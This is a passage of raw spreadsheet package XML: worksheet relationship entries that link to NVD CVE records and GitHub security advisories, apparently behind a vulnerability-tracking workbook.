Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-68779" TargetMode="External" Id="rId371" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-68780" TargetMode="External" Id="rId372" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-68781" TargetMode="External" Id="rId373" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-68784" TargetMode="External" Id="rId374" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69297" TargetMode="External" Id="rId375" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69409" TargetMode="External" Id="rId376" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69497" TargetMode="External" Id="rId377" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69636" TargetMode="External" Id="rId378" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69781" TargetMode="External" Id="rId379" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69839" TargetMode="External" Id="rId380" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-70019" TargetMode="External" Id="rId381" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-73029" TargetMode="External" Id="rId382" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-75132" TargetMode="External" Id="rId383" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-76968" TargetMode="External" Id="rId384" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-76971" TargetMode="External" Id="rId385" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-78453" TargetMode="External" Id="rId386" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-82059" TargetMode="External" Id="rId387" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-82069" TargetMode="External" Id="rId388" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-84391" TargetMode="External" Id="rId389" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69874" TargetMode="External" Id="rId390" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69878" TargetMode="External" Id="rId391" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-71338" TargetMode="External" Id="rId392" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-77887" TargetMode="External" Id="rId393" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-77891" TargetMode="External" Id="rId394" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-86590" TargetMode="External" Id="rId395" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-52773" TargetMode="External" Id="rId396" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-78552" TargetMode="External" Id="rId397" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-78622" TargetMode="External" Id="rId398" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-82056" TargetMode="External" Id="rId399" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-82063" TargetMode="External" Id="rId400" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-55854" TargetMode="External" Id="rId401" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-55856" TargetMode="External" Id="rId402" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-55857" TargetMode="External" Id="rId403" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-55858" TargetMode="External" Id="rId404" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-55859" TargetMode="External" Id="rId405" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-55860" TargetMode="External" Id="rId406" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-70091" TargetMode="External" Id="rId407" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-78620" TargetMode="External" Id="rId408" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69405" TargetMode="External" Id="rId409" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69591" TargetMode="External" Id="rId410" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69637" TargetMode="External" Id="rId411" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69679" TargetMode="External" Id="rId412" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69723" TargetMode="External" Id="rId413" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-78629" TargetMode="External" Id="rId414" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-83557" TargetMode="External" Id="rId415" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-68830" TargetMode="External" Id="rId416" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-68831" TargetMode="External" Id="rId417" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-68851" TargetMode="External" Id="rId418" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69286" TargetMode="External" Id="rId419" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69343" TargetMode="External" Id="rId420" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69406" TargetMode="External" Id="rId421" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69457" TargetMode="External" Id="rId422" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69504" TargetMode="External" Id="rId423" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69527" TargetMode="External" Id="rId424" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69616" TargetMode="External" Id="rId425" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69627" TargetMode="External" Id="rId426" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69808" TargetMode="External" Id="rId427" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69862" TargetMode="External" Id="rId428" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-70145" TargetMode="External" Id="rId429" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-70290" TargetMode="External" Id="rId430" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-71341" TargetMode="External" Id="rId431" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-73008" TargetMode="External" Id="rId432" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-77488" TargetMode="External" Id="rId433" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-77491" TargetMode="External" Id="rId434" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-78454" TargetMode="External" Id="rId435" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-83501" TargetMode="External" Id="rId436" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-83991" TargetMode="External" Id="rId437" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-86220" TargetMode="External" Id="rId438" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-86221" TargetMode="External" Id="rId439" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-86223" TargetMode="External" Id="rId440" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-86225" TargetMode="External" Id="rId441" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-86673" TargetMode="External" Id="rId442" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69402" TargetMode="External" Id="rId443" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69417" TargetMode="External" Id="rId444" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69690" TargetMode="External" Id="rId445" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-84385" TargetMode="External" Id="rId446" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-19032" TargetMode="External" Id="rId447" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-47680" TargetMode="External" Id="rId448" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-56704" TargetMode="External" Id="rId449" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-78446" TargetMode="External" Id="rId450" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-78602" TargetMode="External" Id="rId451" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-78631" TargetMode="External" Id="rId452" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-84386" TargetMode="External" Id="rId453" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-85781" TargetMode="External" Id="rId454" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-78635" TargetMode="External" Id="rId455" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-22575" TargetMode="External" Id="rId456" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-68785" TargetMode="External" Id="rId457" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-78624" TargetMode="External" Id="rId458" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69615" TargetMode="External" Id="rId459" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-78560" TargetMode="External" Id="rId460" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-18567" TargetMode="External" Id="rId461" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-68849" TargetMode="External" Id="rId462" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69832" TargetMode="External" Id="rId463" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69853" TargetMode="External" Id="rId464" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69895" TargetMode="External" Id="rId465" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69548" TargetMode="External" Id="rId466" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-76959" TargetMode="External" Id="rId467" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-78452" TargetMode="External" Id="rId468" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-78508" TargetMode="External" Id="rId469" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-73019" TargetMode="External" Id="rId470" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-76962" TargetMode="External" Id="rId471" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-76963" TargetMode="External" Id="rId472" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-76977" TargetMode="External" Id="rId473" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-78455" TargetMode="External" Id="rId474" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-78516" TargetMode="External" Id="rId475" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-78593" TargetMode="External" Id="rId476" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69904" TargetMode="External" Id="rId477" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-76960" TargetMode="External" Id="rId478" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-76961" TargetMode="External" Id="rId479" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-84389" TargetMode="External" Id="rId480" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-84392" TargetMode="External" Id="rId481" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-82060" TargetMode="External" Id="rId482" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-58234" TargetMode="External" Id="rId483" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-86517" TargetMode="External" Id="rId484" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-85643" TargetMode="External" Id="rId485" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-41855" TargetMode="External" Id="rId486" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-84372" TargetMode="External" Id="rId487" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/advisories/GHSA-2q33-cf8w-7q23" TargetMode="External" Id="rId488" /></Relationships>
</file>

<file path=xl/worksheets/_rels/sheet6.xml.rels><Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-60004" TargetMode="External" Id="rId1" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-62815" TargetMode="External" Id="rId2" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/advisories/GHSA-2xp9-vwfh-vxw4" TargetMode="External" Id="rId3" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-78683" TargetMode="External" Id="rId4" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-78676" TargetMode="External" Id="rId5" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-79657" TargetMode="External" Id="rId6" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/advisories/GHSA-9557-234j-7rv9" TargetMode="External" Id="rId7" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/advisories/GHSA-cw2r-r7mw-j3hc" TargetMode="External" Id="rId8" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-77635" TargetMode="External" Id="rId9" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/advisories/GHSA-g64v-qqpg-v37h" TargetMode="External" Id="rId10" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/advisories/GHSA-xx34-6cjg-prh8" TargetMode="External" Id="rId11" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-75595" TargetMode="External" Id="rId12" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/advisories/GHSA-rgj7-g3m4-5g8c" TargetMode="External" Id="rId13" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-79674" TargetMode="External" Id="rId14" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2018-1000164" TargetMode="External" Id="rId15" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2020-36939" TargetMode="External" Id="rId16" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-62384" TargetMode="External" Id="rId17" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-63312" TargetMode="External" Id="rId18" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-78677" TargetMode="External" Id="rId19" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-78681" TargetMode="External" Id="rId20" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-78682" TargetMode="External" Id="rId21" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-80205" TargetMode="External" Id="rId22" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-83605" TargetMode="External" Id="rId23" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-83606" TargetMode="External" Id="rId24" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-83607" TargetMode="External" Id="rId25" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-83608" TargetMode="External" Id="rId26" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-83609" TargetMode="External" Id="rId27" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-83612" TargetMode="External" Id="rId28" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-83613" TargetMode="External" Id="rId29" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-83614" TargetMode="External" Id="rId30" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-83615" TargetMode="External" Id="rId31" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-83616" TargetMode="External" Id="rId32" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-83617" TargetMode="External" Id="rId33" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-83618" TargetMode="External" Id="rId34" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-83619" TargetMode="External" Id="rId35" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/advisories/GHSA-2rrw-hpqm-36pv" TargetMode="External" Id="rId36" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/advisories/GHSA-6r2r-ww24-7h52" TargetMode="External" Id="rId37" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/advisories/GHSA-7r39-6q8m-qw68" TargetMode="External" Id="rId38" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/advisories/GHSA-j95f-988m-3j2f" TargetMode="External" Id="rId39" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/advisories/GHSA-m4f3-g4cq-hqrx" TargetMode="External" Id="rId40" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/advisories/GHSA-wv46-xpj8-pw53" TargetMode="External" Id="rId41" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-70626" TargetMode="External" Id="rId42" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-78675" TargetMode="External" Id="rId43" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-81525" TargetMode="External" Id="rId44" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-84452" TargetMode="External" Id="rId45" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/advisories/GHSA-4vpg-pfj8-m33q" TargetMode="External" Id="rId46" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/advisories/GHSA-crmc-f4m7-33fj" TargetMode="External" Id="rId47" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/advisories/GHSA-3vrx-526r-64rm" TargetMode="External" Id="rId48" 